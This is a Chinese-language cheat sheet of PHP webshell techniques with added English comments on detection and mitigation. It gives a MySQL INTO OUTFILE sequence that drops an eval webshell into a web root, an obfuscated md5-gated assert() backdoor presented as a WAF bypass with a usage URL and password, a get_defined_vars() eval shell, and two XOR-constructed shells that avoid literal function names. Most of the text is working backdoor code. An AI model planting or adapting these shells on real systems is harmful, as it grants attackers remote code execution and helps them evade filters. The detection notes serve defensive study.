1.mysql執行語句拿shell
-- Three-statement file-write primitive: create a one-column scratch table,
-- store a PHP one-liner in it, then dump that row to disk with
-- SELECT ... INTO OUTFILE. The file written on the last line contains
-- `<?php @eval($_POST[cmd])?>`, i.e. code that evaluates whatever arrives in
-- the POST parameter `cmd` — a webshell. The destination looks like a web
-- server document root (the `WWW` directory of a phpStudy install), so the
-- dropped file becomes reachable over HTTP.
-- Defender notes: INTO OUTFILE needs the FILE privilege on the DB account,
-- the MySQL `secure_file_priv` setting must not confine output to a safe
-- directory, and the MySQL service account must be able to write into the
-- web root. Keeping any one of those three closed defeats this step.
-- Alert on `INTO OUTFILE` / `INTO DUMPFILE` in query logs and on new .php
-- files appearing under the web root.
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php';
2.利用md5繞過waf
---------------------
本體
<?php
// Obfuscated, password-gated webshell. $str1 is a junk string; two strtr()
// passes replace its fragments so that $str3 ends up holding a function
// name, which is then invoked as a variable function ($str3(...)). The
// author's own de-obfuscated form of this script (the "本質" block below)
// states the resulting call is assert($_POST['a']).
$str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
// First rewrite pass: three fragments of $str1 become 'as', 'se' and 'rt'.
$str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
// Second pass: collapses the leftover fragments so only the name remains.
$str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
// Gate: the shell only runs when the md5 of GET parameter `a` equals a fixed
// hex digest — effectively a password. The `@` suppresses the notice when
// `a` is absent, so an unauthenticated probe produces no error output.
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
// strrev() applied twice returns the original string; the two lines below are
// a no-op whose only purpose is to avoid passing $_POST['a'] straight to the call.
$str4 = strrev($_POST['a']);
$str5 = strrev($str4);
// Variable function call: $str3 holds the name built above.
// Detection: strtr()/strrev() chains feeding a variable function, combined
// with an md5() gate on a GET parameter, are characteristic of this pattern
// even when the literal strings `assert` and `eval` never appear.
$str3($str5);
}
?>
---------------------
本質
<?php
// De-obfuscated form of the script above: when the md5 of GET parameter `a`
// matches the fixed digest, the POST parameter `a` is handed to assert().
// On PHP 7 and earlier assert() evaluates a string argument as PHP code, so
// this is a remote code execution backdoor. Defender notes: disable string
// evaluation in assert() via the assert.* / zend.assertions INI settings,
// and treat `assert($_POST` / `assert($_GET` in web content as a
// high-confidence webshell indicator.
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?>
------------------------
利用
.php?a=3fion0hj5965698jhh密碼a
注:default失敗!其他編碼成功!
3.get_defined_vars()函數馬:在過濾$的情況下可使用
<?php
// Webshell variant that never writes the `$_POST` superglobal literally:
// get_defined_vars() at global scope returns every variable in scope,
// including the superglobals, so ['_POST']['1'] reaches the POST parameter
// `1`, which eval() then executes. The page notes this is meant for filters
// that block `$`; detection should therefore key on eval() combined with
// get_defined_vars(), not on `$_POST` strings alone.
eval(get_defined_vars()['_POST']['1']);
?>
4.不含字母數字馬
注:只能菜刀連接!
<?php
// Webshell whose payload strings are built character by character: each
// control byte from chr() is XOR-ed with '`' or ']' so that the constructed
// function and superglobal names never appear in the source. The author's
// trailing comment on the call line gives the decoded form: assert($_POST['_']).
// Caveat on the section title ("no letters or digits"): chr() and the 0x..
// literals are themselves alphanumeric; only the *constructed* strings are not.
// $_   -> six XOR-derived characters (the function name)
$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
// $__  -> '_' followed by four XOR-derived characters (a superglobal name)
$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
// $___ -> variable-variable lookup ($$__) resolving that superglobal array
$___=$$__;
// Variable function call on element '_' of the resolved array.
// Detection: chr()/urldecode() results XOR-ed against single-character
// literals, `$$` variable-variables and a variable function invoked on
// the result are strong indicators regardless of which name is decoded.
$_($___['_']);// assert($_POST['_']);
?>
或者
<?php
// Same construction as the chr() variant, with urldecode('%xx') producing the
// control bytes instead of chr(0x..); each byte is XOR-ed with '`' or ']' to
// assemble the strings at runtime. The author's trailing comment on the call
// line gives the decoded form: assert($_POST['_']).
// $_   -> six XOR-derived characters (the function name)
$_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
// $__  -> '_' followed by four XOR-derived characters (a superglobal name)
$__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
// $___ -> variable-variable lookup ($$__) resolving that superglobal array
$___=$$__;
// Variable function call on element '_' of the resolved array.
// Detection: urldecode() of percent-encoded control bytes XOR-ed against
// single-character literals, `$$` variable-variables and a variable function
// invoked on the result are the signals to scan for; signature matching on
// the literal strings `assert` or `$_POST` will miss this form.
$_($___['_']);// assert($_POST['_']);
?>
https://www.freebuf.com/articles/web/173579.html
https://mochazz.github.io/2017/12/04/bypass1/